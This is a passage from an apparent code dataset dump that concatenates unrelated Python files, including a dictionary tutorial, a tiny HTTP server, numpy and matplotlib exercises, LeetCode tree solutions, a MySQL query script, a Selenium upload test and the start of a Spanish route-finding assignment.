}\n\n# dictionary containing a list of products' prices\nproducts = {'table': 120, 'chair': 40, 'lamp': 14, 'bed': 250, 'mattress': 100}\n\n# dictionary containing students grades\ngrades = {'Alba': 9.5, 'Eduardo': 10, 'Normando': 3.5, 'Helena': 6.5, 'Claudia': 7.5}\n\n'''\n2. Create a dictionary with dict() constructor\nDictionaries can also be created with the built-in function dict(**kwarg). This function takes an arbitrary number of keywords arguments (arguments preceded by an identifier kwarg=value) as input, returning None.\nWe can also create a dictionary using another dictionary in combination with keyword arguments (dict(mapping, **kwarg)) as follows:\nAlternatively, we can construct a dictionary using an iterable (e.g. list of tuples). Each tuple must contain two objects. The first object becomes the key and the second becomes the value of the dictionary.\n'''\n# create a dictionary with dict() function using keyword arguments # Notice the input was not given in the format of dictionary.. the dict constructor will transform it dictionary format.\n# dictionary - ages of students\nstudents_ages = dict(Amanda=27, Teresa=38, Paula=17, Mario=40)\n\n# create a dictionary with dict() function using another dictionary and keyword arguments\n# dictionary - ages of students\nstudents_ages = dict({'Amanda':27,'Teresa':38},Paula=18,Mario=40) #Notice the single quotes not given as providing the input to constructor(**kwargs). refer to args&kwargs.py for more details\nprint(students_ages)\n\n# create a dictionary with dict() function using an iterable (list of tuples). # [] inside dict should be given or else we get error(dict expected at most 1 arguments, got 4) as dict is considering every tuple as a different argument and it expects only one argument.\n# dictionary - ages of students\nstudents_ages = dict([('Amanda', 27), ('Teresa', 38), ('Paula', 17), ('Mario', 40)])\nprint(students_ages)\n\n#Lastly, we can create a dictionary using two lists. First, we have to build an iterator of tuples using zip(*iterables) function. Then, we employ the dict([iterable, **kwarg]) function to construct the dictionary, as we did previously.\nstudents = ['Amanda', 'Teresa', 'Paula', 'Mario']\nages = [27, 38, 17, 40]\ns = dict(zip(students,ages))\n\n'''\n#Access values in a dictionary\n#To access dictionary values, we cannot use a numeric index (as we do with lists or tuples), since the dictionaries are unordered containers. Instead, we enclose the key using square brackets([]). If we try to access a value using an undefined key, a KeyError is raised.\n#To avoid getting an exception with undefined keys, we can use the method dict.get(key[, default]). This method returns the value for key if key is in the dictionary, else returns default. If default is not provided, it returns None (but never raises an exception).\n'''\n# access population\npopulation['Munich']\n# 1471508\n\n# # access a value using a numeric index\n# population[1]\n# # KeyError\n\n# # access population of Stuttgart\n# population['Stuttgart']\n# # KeyError\n\n# access population of Stuttgart using .get() method without default value\nprint(population.get('Munich'))\n# 1471508\n\n# access population of Stuttgart using .get() method without default value\nprint(population.get('Stuttgart'))\n# None\n\n# access population of Stuttgart using .get() method with default value\nprint(population.get('Stuttgart', 'Not found'))\n# Not found\n\n#Inserting elements\n#To insert an element in a dictionary, we can use square brackets as follows:\nproducts['pillow'] = 10\nprint(products)\n\n#To insert multiple items at once, we can use dict.update([]). This method updates key-value pairs from other,overwriting existing keys.\n## add shelf and sofa to the products dictionary using another dictionary object\nproducts.update({'shelf':70,'sofa':300})\nprint(products)\n\n## add three new items to the grades dictionary using keyword arguments\ngrades.update(Violeta=5.5, Marco=6.5, Paola=8)\nprint(grades)\n\n## add two cities to the population dictionary using a list of tuples\npopulation.update([('Stuttgart', 632743),('Dusseldorf', 617280)])\nprint(population)\n#As shown above, the .update() method accepts as an argument not only another dictionary, but also a list of tuples or keyword arguments. This method modifies the dictionary in-place, returning None.\n\n\n##5. Change elements in a dictionary\n#We can change the value of an item by accessing the key using square brackets ([]). To modify multiple values at once, we can use the .update() method, since this function overwrites existing keys.\n# Subsequently, we increase the price of a sofa 100 units, and we modify the grades of two students.\nprint(products)\nproducts['sofa'] = 400\n\nprint(products)\n#{'table': 120, 'chair': 40, 'lamp': 14, 'bed': 250, 'mattress': 100, 'pillow': 10, 'shelf': 70, 'sofa': 400}\n\n# modify the grades of two students\ngrades.update({'Normando':2.5,'Violetta':6})\nprint(grades)\n\n#6. Remove elements in a dictionary\n#To remove an element in a dictionary, we can use either the del dict[key] keyword or the dict.pop(key[, default]) method.\n#The del dict[key] keyword removes the given element from the dictionary, raising a KeyError if key does not exists.\nprint(population)\n#{'Berlin': 3748148, 'Hamburg': 1822445, 'Munich': 1471508, 'Cologne': 1085664, 'Frankfurt': 753056, 'Stuttgart': 632743,\n# 'Dusseldorf': 617280}\n# del population['Ingolstadt'] #KeyError: 'Ingolstadt'\n\n# key exists\n# the element dusseldorf is removed\ndel population['Dusseldorf']\n\n# key exists - the item is removed and the value returned\npopulation.pop('Stuttgart')\n# 632743 - returned value\n\n#If key exists in the dictionary, the dict.pop(key[, default]) method removes the item with the given key from the dictionary and returns its value. On the contrary, if key does not exist in the dictionary, the method returns the default value. If no default value is provided and key does not exist, the .pop() method will raise an exception (KeyError).\n\nprint(population)\n#{'Berlin': 3748148, 'Hamburg': 1822445, 'Munich': 1471508, 'Cologne': 1085664, 'Frankfurt': 753056}\n\n# key does not exists but default value is provided\npopulation.pop('Ingolstadt', 'Value not found')\n# 'Value not found' - returned value\n\n# # key does not exists and default value is NOT provided\n# population.pop('Garching')\n# # KeyError\n\n'''\n##7. Check if a key exists\n# To check whether a key exists in a dictionary, we have to use a membership operator. Membership operators are used to test whether a value is found in a sequence (e.g. strings, lists, tuples, sets, or dictionaries). There are two membership operators, as explained below.\n# in → Evaluates to true if the object on the left side is included in the object on the right side.\n# not in → Evaluates to true if the object on the left side is not included in the object on the right side.\n'''\nprint('Berlin' in population)\nprint('Ingolstadt' not in population)\n#As shown above, membership operators (in and not in) can be used to check whether a key exists in a dictionary, but they can also be used with other sequences in the following manner.\n\n# membership operators - in / not in\n#strings\nprint('a' in 'Amanda')\n\n#lists\nprint(3 in [1,2,3,4])\n\n#Tuples\nprint(s not in (1,2))\n\n#sets\nprint('Valencia' in {'Barcelona', 'Valencia', 'Madrid','Berlin'})\n\n#8. Copy a dictionary\n#To copy a dictionary, we can simply use the dict.copy() method. This method returns a shallow copy of the dictionary. We have to be careful with shallow copies, since if your dictionary contains another container-objects like lists, tuples, or sets, they will be referenced again and not duplicated.\n\n# dictionary with students heights\nstudents = {'Marco': 173, 'Luis': 184, 'Andrea': 168}\n\n# create a shallow copy\nstudents_2 = students.copy()\n\n# modify the height of luis in the shallow copy\nstudents_2['Luis'] = 180\n\n# the modification in students_2 is not observed in students since 180 is an int\nprint(students)\n# {'Marco': 173, 'Luis': 184, 'Andrea': 168}\n\nprint(students_2)\n# {'Marco': 173, 'Luis': 180, 'Andrea': 168}\n\n\n# dictionary with students heights and weights\nstudents_weights = {'Marco': [173, 70], 'Luis': [184, 80], 'Andrea': [168, 57]}\n\n# create a shallow copy\nstudents_weights_2 = students_weights.copy()\n\n# modify the height of luis in the shallow copy\nstudents_weights_2['Luis'][0] = 180\n# the modification in students_weights_2 is observed in students_weights\n# since the list containing the weight and height is referenced and not duplicated\nprint(students_weights)\n# {'Marco': [173, 70], 'Luis': [180, 80], 'Andrea': [168, 57]}\n\n# solution --> create a deepcopy of the dictionary\n\n#To avoid this problem, we can create a deep copy using copy.deepcopy(x) function (defined in the copy module) as follows:\n\nimport copy\nstudents_weights_2 = copy.deepcopy(students_weights)\nstudents_weights_2[0] = 174\n# the modification in students_weights_2 is NOT observed in students_weights\n# since we are working with a deep copy\n\nprint(students_weights)\n# {'Marco': [173, 70], 'Luis': [184, 80], 'Andrea': [168, 57]}\n\nprint(students_weights_2)\n# {'Marco': [173, 70], 'Luis': [180, 80], 'Andrea': [168, 57]}\n\n'''\n##The difference between shallow copies and deep copies is only relevant when the dictionary contains other objects like lists, since those objects will be referenced instead of duplicated (shallow copy). To create a fully independent clone of the original dictionary, we have to make a deep copy.\n\n#It is important to bear in mind that the = operator does not make a copy of the dictionary. It is just another name to refer to the same dictionary, meaning any modification to the new dictionary is reflected in the original one.\n'''\n\n# dictionary with calories in fruits\nfruits = {'Orange': 50, 'Apple': 65, 'Avocado': 160, 'Pear': 75}\n\n# copy the dictionary using = operators\nfruits_2 = fruits\n\n# modify fruits_2 (delete one item)\nfruits_2.pop('Orange')\n\n# the modification is reflected in fruits\nprint(fruits)\n# {'Apple': 65, 'Avocado': 160, 'Pear': 75}\n\n#9. Determine the length of the dictionary\n#To determine how many key-value pairs the dictionary contains, we can use the len() function. This function returns the number of items of an object. The input of the function can be a dictionary, but also another type of sequence such as a string, list, tuple, or set.\n\nprint(population)\nprint(len(population))\n\n#10. Loop through a dictionary\n#Iterating through keys\n#To iterate over the keys, we can use the dictionary directly in a for loop as follows:\n\n# iterate through keys\nfor city in population:\n print(city)\n\n#Alternatively, we can use the dict.keys() method. This method returns a view object, containing the keys of the dictionary.\nfor city in population.keys():\n print(city)\n'''\n#Iterating through values\n#If you just need to work with the values of a dictionary, then you can use the dict.values() method in a for loop. This method returns a view object that contains the values of the dictionary.\n'''\n#We can compute how many people live in the 5 largest German cities using dict.values() method as follows:\n\ninhabitants=0\nfor number in population.values():\n inhabitants += number\nprint(inhabitants)\n\n'''\n#Iterating through items\n#When you’re working with dictionaries, it’s likely that you need to use the keys and the values. To loop through both, you can use the dict.items() method. This method returns a view object, containing key-value pairs as a list of tuples.\n#We can determine the student with the lowest test score using the dict.items() method in combination with a for loop as follows:\n'''\n\n# students grades dictionary\nprint(grades)\n# {'Alba': 9.5, 'Eduardo': 10, 'Normando': 2.5, 'Helena': 6.5, 'Claudia': 7.5, 'Violeta': 6, 'Marco': 6.5, 'Paola': 8}\n\n# dict.items() - dictionary view object containing key-value pairs as a list of tuples\ngrades.items()\n# dict_items([('Alba', 9.5), ('Eduardo', 10), ('Normando', 2.5), ('Helena', 6.5), ('Claudia', 7.5),\n# ('Violeta', 6), ('Marco', 6.5), ('Paola', 8)])\n\n# determine student with the lowest test score\nmin_grade = 10\nmin_student = ''\nfor student, grade in grades.items():\n if grade < min_grade:\n min_student = student\n min_grade = grade\n\nprint(\"LOwest test score\",min_student)\n# Normando\n\n'''\n#11. Dictionary comprehensions\nPython for-loops are very handy in dealing with repetitive programming tasks; however, there is another alternative to achieve the same results in a more efficient way: dictionary comprehensions.\nDictionary comprehensions allow the creation of a dictionary using an elegant and simple syntax: {key: value for vars in iterable}. In addition, they are faster than traditional for-loops.\nWe can filter the products with a price lower than 100 euros using both a traditional for-loop and a dictionary comprehension. '''\n\n# list of prices\nprint(products)\n# {'table': 120, 'chair': 40, 'lamp': 14, 'bed': 250, 'mattress': 100, 'pillow': 10, 'shelf': 70, 'sofa': 400}\n\n##########################\n###traditional for loop###\n##########################\n\n# empty dictionary\nproducts_low = {}\n\n# select only the items with a price lower than 100\nfor product, value in products.items():\n if value < 100:\n products_low.update({product: value})\n\nprint(products_low)\n# {'chair': 40, 'lamp': 14, 'pillow': 10, 'shelf': 70}\n\n\n##############################\n###dictionary comprehension###\n##############################\n\n# select only the items with a price lower than 100\nproducts_low = {product: value for product, value in products.items() if value < 100}\n\nprint(products_low)\n# {'chair': 40, 'lamp': 14, 'pillow': 10, 'shelf': 70}\n#As we can observe, dictionary comprehensions provide the same results as traditional for-loops in a more elegant way.\n\n'''\n12. Nested dictionaries\nNested dictionaries are dictionaries that contain other dictionaries. We can create a nested dictionary in the same way we create a normal dictionary using curly brackets ({}).\nThe following nested dictionary contains information about 5 famous works of art. As we can observe, the values of the dictionary are other dictionaries as well.\n'''\n# nested dictionary containing information about famous works of art\nworks_of_art = {'The_Starry_Night': {'author': 'Van Gogh', 'year': 1889, 'style': 'post-impressionist'},\n 'The_Birth_of_Venus': {'author': 'Sandro Botticelli', 'year': 1480, 'style': 'renaissance'},\n 'Guernica': {'author': 'Pablo Picasso', 'year': 1937, 'style': 'cubist'},\n 'American_Gothic': {'author': 'Grant Wood', 'year': 1930, 'style': 'regionalism'},\n 'The_Kiss': {'author': 'Gustav Klimt', 'year': 1908, 'style': 'art nouveau'}}\nprint(works_of_art)\n#To access elements in a nested dictionary, we specify the keys using multiple square brackets ([]).\n# access elements in a nested dictionary\nworks_of_art['Guernica']['author']\n# 'Pablo Picasso'\n\nworks_of_art['American_Gothic']['style']\n# 'regionalism'\n\n#13. Alternative containers : OrderedDict, defaultdict, and Counter\n'''\nThe collections module provides alternative container datatypes to built-in Python containers. Three dictionary subclasses contained in the collections module that are pretty handy when working with Python are: (1)OrderedDict, (2)defaultdict, and (3)Counter.\nOrderedDict\nOrderedDict consists of a dictionary that remembers the order in which its contents are added. In Python 3.6+ dictionaries are also insertion ordered, meaning they remember the order of items inserted. However, to guarantee element order across other Python versions, we have to use OrderedDict containers.\n'''\n\nimport collections\n\n# create an OrderedDict of chemical elements\ndictionary = collections.OrderedDict({'hydrogen': 1, 'helium': 2, 'carbon': 6, 'oxygen': 8})\n\n# type OrderedDict\nprint(type(dictionary))\n# \n\n# dictionary keys --> .keys() method\nprint(dictionary.keys())\n# odict_keys(['hydrogen', 'helium', 'carbon', 'oxygen'])\n\n# dictionary values --> .values() method\nprint(dictionary.values())\n# odict_values([1, 2, 6, 8])\n\n# insert a new element\ndictionary['nitrogen'] = 7\n\n# nitrogen last position since it is the last element added\nprint(dictionary)\n# OrderedDict([('hydrogen', 1), ('helium', 2), ('carbon', 6), ('oxygen', 8), ('nitrogen', 7)])\n#As shown above, OrderedDict accepts dictionary methods and functions. Moreover, elements can be inserted, changed, or deleted in the same way as with normal dictionaries.\n\nimport collections\n\n# create an OrderedDict of chemical elements\ndictionary = collections.OrderedDict({'hydrogen': 1, 'helium': 2, 'carbon': 6, 'oxygen': 8})\n\n# type OrderedDict\nprint(type(dictionary))\n# \n\n# dictionary keys --> .keys() method\nprint(dictionary.keys())\n# odict_keys(['hydrogen', 'helium', 'carbon', 'oxygen'])\n\n# dictionary values --> .values() method\nprint(dictionary.values())\n# odict_values([1, 2, 6, 8])\n\n# insert a new element\ndictionary['nitrogen'] = 7\n\n# nitrogen last position since it is the last element added\nprint(dictionary)\n# OrderedDict([('hydrogen', 1), ('helium', 2), ('carbon', 6), ('oxygen', 8), ('nitrogen', 7)])\n\n#As shown above, OrderedDict accepts dictionary methods and functions. Moreover, elements can be inserted, changed, or deleted in the same way as with normal dictionaries.\n\n#defaultdict\n#Defaultdicts are a dictionary subclass that assign a default value when a key is missing (it has not been set yet). They never raise a KeyError, if we try to access an item that is not available in the dictionary, instead a new entry is created.\n#Defaultdicts take a function as an argument, and initialize the missing key with the value returned by the function. In the example below, the keys are initialized with different values, depending on the function employed as first argument.\n\n\nimport collections\nimport numpy as np\n\n# missing key initialized with a 0\ndefault_1 = collections.defaultdict(int)\n\ndefault_1['missing_entry']\nprint(default_1)\n# defaultdict(, {'missing_entry': 0})\n\n# missing key initialized with an empty list\ndefault_2 = collections.defaultdict(list, {'a': 1, 'b': 2})\n\ndefault_2['missing_entry']\nprint(default_2)\n# defaultdict(, {'a': 1, 'b': 2, 'missing_entry': []})\n\n# missing key initialized with a string\ndefault_3 = collections.defaultdict(lambda : 'Not given', a=1, b=2)\n\ndefault_3['missing_entry']\nprint(default_3)\n# defaultdict( at 0x000001DEF6ADF730>, {'a': 1, 'b': 2, 'missing_entry': 'Not given'})\n\n# missing key initialized with a numpy array\ndefault_4 = collections.defaultdict(lambda: np.zeros(2))\n\ndefault_4['missing_entry']\nprint(default_4)\n# defaultdict( at 0x000001DEF6ADF950>, {'missing_entry': array([0., 0.])})\n#As we can observe, we can pass a dictionary or keywords as second argument (optional) to initialize the defaultdict container.\n\n\n#Counter\n#A Counter is a dictionary subclass for counting hastable objects. The function returns a Counter object, where elements are stored as keys and their counts are stored as values. Using this function, we can easily count the elements of a list, as shown below.\n\nletters = ['a','b','c','a','b','e','d']\n\ncounter = collections.Counter(letters)\nprint(counter)\nprint(counter.most_common(3))\n#As shown above, we can easily obtain the most frequent elements with the .most_common([n]) method. This method returns a list of the n most common elements and their counts.\n\n#14. Create a Pandas DataFrame from a dictionary.\n#A Pandas DataFrame is a two-dimensional tabular data where each row represents an observation and each column a variable. A Pandas DataFrame can be created using the pandas.DataFrame constructor. This function accepts as input various python containers (e.g. lists, dictionaries, or numpy arrays). However, in this article, we explain only the ways to create a DataFrame that involve the use of dictionaries.\n#Create a DataFrame from a dictionary\n#We can create a DataFrame from a dictionary, where the keys represent column names, and the values represent column data in the following manner:\n\nimport pandas as pd\n\n# create a Pandas DataFrame from a dictionary - keys (column name) - value (column data)\ndf = pd.DataFrame({'name': ['Mario', 'Violeta', 'Paula'],\n 'age': [22, 27, 19],\n 'grades': [9, 8.5, 7]})\nprint(df)\n#As we can observe, the default index is just the row number (an integer index beginning at 0). We can modify these indexes by passing the index list to the DataFrame constructor.\n\ndf_index = pd.DataFrame({'name': ['Mario', 'Violeta', 'Paula'],\n 'age': [22, 27, 19],\n 'grades': [9, 8.5, 7]}, index=['student_1','student_2','student_3'])\n\nprint(df_index)\n\n#Create a DataFrame from a list of dictionaries\n#A list of dictionaries can also be used to create a DataFrame, where the keys represent column names. As before, we can change indexes by passing the index list to the DataFrame function.\n# create a Pandas DataFrame from a list of dictionaries - keys(column name) - with custom indexes\ndf_2 = pd.DataFrame([{'name': 'Mario', 'age': 22, 'grades':9},\n {'name': 'Violeta', 'age': 27, 'grades':8.5},\n {'name': 'Paula', 'age': 19, 'grades':7}], index=['student_1', 'student_2', 'student_3'])\n\nprint(df_2)","sub_path":"towardsdatascience_dictionaries.py","file_name":"towardsdatascience_dictionaries.py","file_ext":"py","file_size_in_byte":22027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"580697267","text":"#!/usr/bin/env python\n\nimport BaseHTTPServer\nimport logging\nimport optparse\nimport sys\n\nimport pages\n\nclass TibstatsHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.process_request()\n\n def do_POST(self):\n self.process_request()\n\n def do_HEAD(self):\n self.send_error(418, \"Short and stout\")\n\n def process_request(self):\n pages.handle_http_request(self)\n\n # maybe want to hook the internal request logging mechanism?\n #def log_message(self, format, *posargs):\n # logging.info(format, *posargs)\n\ndef main():\n parser = optparse.OptionParser()\n parser.add_option(\"-p\", \"--port\", type=\"int\", default=17091)\n opts, args = parser.parse_args()\n logging.basicConfig(level=logging.DEBUG)\n server_class = BaseHTTPServer.HTTPServer\n handler_class = TibstatsHTTPRequestHandler\n server_address = (\"\", opts.port)\n logging.info(\"Starting server on %s\", server_address)\n httpd = server_class(server_address, handler_class)\n httpd.serve_forever()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"projects/tibstat/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"440862144","text":"import numpy as np\n\nN = 4\nM = 5\n\nA = np.random.randint(low=-9, high=10, size=(N, M))\nprint(\"Матрица:\\r\\n{}\\n\".format(A))\n\nSum = A.sum()\nprint(\"Сумма элементов всей матрицы: \" + str(Sum) + \"\\n\")\nSum_column = A.sum(axis=1)\nX = []\nfor i in range(0, N):\n n = Sum_column[i] / Sum\n X.append(n)\nX = np.array(X)[: , np.newaxis]\nA = np.hstack((A, X))\n\nprint(A)\n","sub_path":"2 часть курсовой/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377571934","text":"#Вторая программа\n\nfrom matplotlib import pyplot\nfrom openpyxl import load_workbook\n\ndef getvalue(x):\n return x.value\n\nwb = load_workbook('data_analysis_lab.xlsx')\n\nlict = wb['Data']\n\nyears = list(map(getvalue, lict['A'][1:]))\nrelative_temp = list(map(getvalue, lict['C'][1:]))\nactivity = list(map(getvalue, lict['D'][1:]))\n\npyplot.plot(years, relative_temp, label=\"Относительная температура\")\npyplot.plot(years, activity, label=\"Солнечная активность\")\n\npyplot.xlabel('Год')\npyplot.ylabel('Температура/Солнечная активность')\npyplot.legend(loc='best')\n\npyplot.show()","sub_path":"Lab1.2/SecondLab.py","file_name":"SecondLab.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"171196177","text":"class TreeNode(object):\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n def rightSideView(self, root):\n if not root:\n return []\n queue = []\n queue.append(root)\n result = []\n\n while queue:\n size = len(queue)\n for i in range(size):\n node = queue[0]\n queue = queue[1:]\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n result.append(node.val)\n\n return result","sub_path":"2021-02-02_DFS-BFS/199_BinaryTreeRightSideView.py","file_name":"199_BinaryTreeRightSideView.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102472638","text":"#!/usr/bin/python3\n\"\"\"Conn module\"\"\"\nimport MySQLdb\nfrom sys import argv\n\nif __name__ == '__main__':\n myU = argv[1]\n myP = argv[2]\n myDB = argv[3]\n sName = argv[4]\n myH = \"localhost\"\n db = MySQLdb.connect(host=myH, port=3306, user=myU, passwd=myP, db=myDB)\n cur = db.cursor()\n myQ = \"SELECT c.name FROM cities AS c, states AS s \"\n myQ += \"WHERE s.name = %s AND s.id = c.state_id ORDER BY c.id;\"\n cur.execute(myQ, (sName,))\n result = cur.fetchall()\n if (len(result) is not 0):\n for row in result:\n for col in row:\n if (result.index(row) is len(result) - 1):\n print(col)\n else:\n print(col, end=', ')\n else:\n print()\n cur.close()\n db.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465565935","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param {TreeNode} root\n # @return {string[]}\n def binaryTreePaths(self, root):\n \n if root is None: return []\n \n def allBinaryTreePaths(currPath, pathSets, currNode):\n if currNode.left is None and currNode.right is None:\n pathSets.append(currPath)\n else:\n if currNode.left:\n allBinaryTreePaths(currPath + '->' + str(currNode.left.val), pathSets, currNode.left)\n if currNode.right:\n allBinaryTreePaths(currPath + '->' + str(currNode.right.val), pathSets, currNode.right)\n \n pathSets = []\n allBinaryTreePaths(str(root.val), pathSets, root)\n return pathSets","sub_path":"257-Binary-Tree-Paths/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316298554","text":"import unittest\nimport config\nimport os\nimport time\nfrom LoginMain import UserLogin\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\n\n\nclass DocumentUpload(unittest.TestCase):\n def setUp(self):\n self.login = UserLogin().__int__()\n self.login.signin.click()\n start_translate = WebDriverWait(self.login.driver, 20) \\\n .until(lambda driver: driver.find_element_by_id(\"start-translate\"))\n start_translate.click()\n self.source_lang = self.login.driver.find_element_by_id(\"source-lang\")\n self.target_lang = self.login.driver.find_element_by_id(\"target-lang\")\n self.upload = self.login.driver.find_element_by_id(\"upload\")\n self.back = self.login.driver.find_element_by_id(\"back\")\n self.file_upload = self.login.driver.find_element_by_xpath(\"//input[@type='file']\")\n time.sleep(3)\n\n def test1_upload_document(self):\n try:\n driver = self.login.driver\n self.source_lang.click()\n source_english = WebDriverWait(driver, 20).until(lambda d: d.find_element_by_id(\"English\"))\n source_english.click()\n self.target_lang.click()\n target_hindi = WebDriverWait(driver, 20).until(lambda d: d.find_element_by_id(\"Hindi\"))\n target_hindi.click()\n time.sleep(2)\n self.file_upload.send_keys(\"/home/roshan/Downloads/2c6d61e3-3a84-4f37-814e-d20f2073a05f.pdf\")\n time.sleep(5)\n self.upload.click()\n result = WebDriverWait(driver, 20).until(lambda d: d.current_url == config.view_document_url)\n time.sleep(5)\n if result:\n print(\n f'=HYPERLINK(\"{config.hyperlink_pretext}{os.path.basename(__file__)}\";\"test1_upload_document\"),PASSED')\n except Exception:\n print(\n f'=HYPERLINK(\"{config.hyperlink_pretext}{os.path.basename(__file__)}\";\"test1_upload_document\"),FAILED')\n finally:\n driver.quit()\n\n def test2_click_on_back_button(self):\n try:\n driver = self.login.driver\n self.back.click()\n result = WebDriverWait(driver, 20).until(lambda d: d.current_url == config.view_document_url)\n time.sleep(5)\n if result:\n print(\n f'=HYPERLINK(\"{config.hyperlink_pretext}{os.path.basename(__file__)}\";\"test2_click_on_back_button\"),PASSED')\n except Exception:\n print(\n f'=HYPERLINK(\"{config.hyperlink_pretext}{os.path.basename(__file__)}\";\"test2_click_on_back_button\"),FAILED')\n finally:\n driver.quit()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/DocumentUpload.py","file_name":"DocumentUpload.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574538046","text":"from flask import Flask, jsonify, request, send_file, send_from_directory, flash, render_template, url_for, redirect\nfrom flask_restful import Api\n\nfrom flask_login import LoginManager, login_user, logout_user, login_required, current_user\n\nfrom db import db\nfrom blacklist import BLACKLIST\nfrom resources.user import User, UserLogin\nfrom resources.wordpress import Wordpress, WordpressList\nfrom resources.wordpressCust import WordpressCust, WordpressListCust\nfrom resources.store import Store, StoreList\nfrom resources.accessiDb import Db, DbList\nfrom resources.cPanel import Cpanel, CpanelList\nfrom resources.ftp import Ftp, FtpList\nfrom resources.plugin import Plugin, PluginList\nfrom models.user import UserModel\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['PROPAGATE_EXCEPTIONS'] = True\n# enable blacklist feature\n# allow blacklisting for access and refresh tokens\n\napp.secret_key = 'jose' # could do app.config['JWT_SECRET_KEY'] if we prefer\n# Configure application to store JWTs in cookies. Whenever you make\n# a request to a protected endpoint, you will need to send in the\n# access or refresh JWT via a cookie.\n\napi = Api(app)\nlogin_manager = LoginManager(app)\ndb.init_app(app)\n\n\n@app.before_first_request\ndef create_tables():\n db.create_all()\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return UserModel.query.get(int(user_id))\n\n\napi.add_resource(Store, '/store/')\napi.add_resource(StoreList, '/stores')\n# wordpress\napi.add_resource(Wordpress, '/wordpress/')\napi.add_resource(WordpressList, '/wordpress')\n# wordpress User\napi.add_resource(WordpressCust, '/wordpress-cust/')\napi.add_resource(WordpressListCust, '/wordpress-cust')\n# database\napi.add_resource(Db, '/db/')\napi.add_resource(DbList, '/db')\n# cPanel\napi.add_resource(Cpanel, '/cpanel/')\napi.add_resource(CpanelList, '/cpanel')\n# ftp\napi.add_resource(Ftp, '/ftp/')\napi.add_resource(FtpList, '/ftp')\n# plugin\napi.add_resource(Plugin, '/plugin/')\napi.add_resource(PluginList, '/plugin')\n\n\n# api.add_resource(UserRegister, '/register')\napi.add_resource(User, '/user/')\napi.add_resource(UserLogin, '/api/login')\n\n\n#------------------Login Form---------------#\n\n\n@app.route('/')\n@login_required\ndef finder():\n return render_template('build/index.html')\n\n\n@app.route('/')\ndef login():\n return render_template('build/index.html')\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return 'Log out effettuato '\n\n\nif __name__ == '__main__':\n\n login_manager.init_app(app)\n\n app.run(port=5000, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"251899494","text":"# Tome como referencia los formatos del video del curso \"Ejemplo - Gráfica de ciudades colombianas\". \n\n#Escriba un programa de Python que:\n\n#1. Tenga una función que se llama lee_datos que tiene como primer\n#argumento la cadena de caracteres que representa el nombre del\n#archivo con las coordenadas (con el mismo formato del video) y como\n#segundo argumento la cadena de caracteres que representa el nombre\n#del archivo con los nombres de las ciudades. La función debe devolver\n#dos arrays de numpy, el primer array corresponde a las coordenadas y\n#el segundo a los nombres de las ciudades. \n\n#2. Tenga una función que se llama genera_recorrido. Esta función\n#tiene como argumento de entrada un array con nombres de ciudades. La\n#función genera una lista aleatoria de n+1 enteros donde el primer y\n#último elemento es el número 0. n es la longitud del array del nombre\n#de ciudades. Los demás elementos de la lista deben incluir, en\n#desorden, los números del 1 al n-1. En este lista el entero n va a\n#representar a la ciudad n-esima en el array de entrada. Esta lista de\n#enteros va a representar entonces un recorrido que empieza y termina\n#en la primera ciudad de la lista y pasa por todas las ciudades. La\n#función debe devolver la lista de n+1 enteros. \n\n#3. Tenga una función que se llama calcula_distancia. Esta función\n#toma como primer argumento de entrada un array de coordenadas de\n#ciudades, como segundo argumento un entero a, como tercer argumento\n#un entero b. Los enteros representan las filas del array de\n#coordenadas. La función deben calcular la distancia entre las dos\n#ciudades representadas por los dos enteros a y b, dadas las\n#coordenadas de entrada. La función debe devolver el valor de la\n#distancia. Calcule esta distancia asumiendo que la Tierra es una\n#esfera perfecta de radio 6400 km y que la medición se hace sobre el\n#arco de longitud mínima sobre esa\n#esfera https://www.johndcook.com/lat_long_details.html \n\n#4. Tenga una función que se llama calcula_distancia_total. Esta\n#función toma como primer argumento de entrada un array de coordenadas\n#de ciudades y como segundo argumento una lista con al menos dos\n#enteros. Los enteros representan las filas del array de\n#coordenadas. La función debe calcular la distancia total del\n#recorrido representado por la lista de enteros de entrada. La función\n#debe devolver la distancia total. \n\n#5. Tenga una función que se llama encuentra_recorrido. La\n#función toma como primer argumento el nombre del archivo con\n#coordenadas de ciudades y como segundo argumento el nombre del\n#archivo con los nombres de las ciudades. La función utiliza las\n#funciones de los cuatro puntos anteriores para generar 100 recorridos\n#diferentes por las 